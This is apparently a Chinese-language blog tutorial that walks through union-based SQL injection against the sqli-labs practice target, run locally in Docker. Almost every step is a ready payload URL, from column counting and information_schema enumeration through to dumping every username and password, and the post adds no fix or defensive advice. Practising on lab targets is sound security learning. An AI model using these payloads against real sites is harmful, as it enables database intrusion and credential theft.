手把手教你通过SQL注入盗取数据库信息

目录

• 数据库结构
• 注入示例
  • 判断共有多少字段
  • 判断字段显示位置
  • 显示出登录用户和数据库名
  • 查看所有数据库
  • 获取对应数据库的表
  • 获取对应表的字段名称
  • 获取用户密码

SQL注入（SQL Injection），指将非法的SQL命令插入到URL或者Web表单中请求，而这些请求被服务器认为是正常的SQL语句从而进行执行。

我们都是善良的银！一生戎码只为行侠仗义，知道这个不是为了非法的事，只是知道小偷怎么偷东西才能更好地防范。

下面我们用sqli-labs这个开源项目来演示一下SQL注入盗取信息的全程，我们不是为了

sqli-labs是一个sql注入的练习靶机，项目地址为：/sqli-labs

源码是用php写的，这里我使用的是docker部署的，如下

这里我是去store.docker.com搜索的镜像使用：https://hub.docker.com/r/acgpiano/sqli-labs

运行

docker run -dt --name sqli-lab -p 8089:80 acgpiano/sqli-labs:latest

运行后打开http://127.0.0.1:8089/，界面如下

这是一个闯关的课程，一个有22课，接下来我们只会用到Less-1来演示，也就是单引号注入，但是核心原理其实都是通过union出对应的信息盗取数据。

更多技巧可以参考这篇文章：SQL注入篇——sqli-labs最详细1-75闯关指南

打开：http://127.0.0.1:8089/Less-1/，看到如下内容

我们输入id：http://127.0.0.1:8089/Less-1/?id=1，显示了id为1的用户

对应的php源码是这样的：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

相当于最后sql变成了

SELECT * FROM users WHERE id='1' LIMIT 0,1

知其然也知其所以然，欧耶~

数据库结构

数据库是这样的

注入示例

下面使用Less-1的单引号注入来演示一下盗取信息的过程

我们把id改成：id=1' and 1=1 -- -，访问

http://127.0.0.1:8089/Less-1/?id=1' and 1=1 -- -

可以正常访问，说明可以用单引号注入，SQL语句相当于变成了

SELECT * FROM users WHERE id='1' and 1=1 -- ' LIMIT 0,1

这就是传说中的单引号注入，相当于变成了下面这样的语句，1=1是一定满足条件的，相当于构造了下面这样的SQL语句

判断共有多少字段

union select 1,user(),database()­­ -- -

通过orderby试探，order by是可以直接指定字段的列来排序的，所以可以挨个试，

比如当我们使用order by 5，访问

http://127.0.0.1:8089/Less-1/?id=1' order by 5 -- -

报错了，说明不对

当我们用order by 3的时候，正常返回了，访问地址：

http://127.0.0.1:8089/Less-1/?id=1' order by 3 -- -

正常返回了，说明字段有3个。

判断字段显示位置

union select 1,2,3 -- -

我们构造一下，访问

http://127.0.0.1:8089/Less-1/?id='union select 1,2,3 -- -

显示出登录用户和数据库名

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 -- -

已经匹配出了字段，接下来的所有用户信息都需要经过union相等的列来获取，访问

http://127.0.0.1:8089/Less-1/?id='  union select 1,database(),user() -- -

查看所有数据库

union select 1,2,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)-- -

访问

http://127.0.0.1:8089/Less-1/?id=' union select 1,2,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)-- -

其实原理就是构造出了这样的语句

获取对应数据库的表

UNION SELECT 1,2,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='security') -- -

访问

http://127.0.0.1:8089/Less-1/?id=' UNION SELECT 1,2,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='security') -- -

访问如下



我们看到有emails,referers,uagents,users这四个表

获取对应表的字段名称

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -

访问

http://127.0.0.1:8089/Less-1/?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -

可以看到用id、username、password3个字段

获取用户密码

union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -

访问

http://127.0.0.1:8089/Less-1/?id=' union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3 -- -

用户名和密码全出来了，厉害了我的哥！

到这里，我们就学会了怎么把对方所有的隐私load出来了，有点可怕啊！你学会了吗！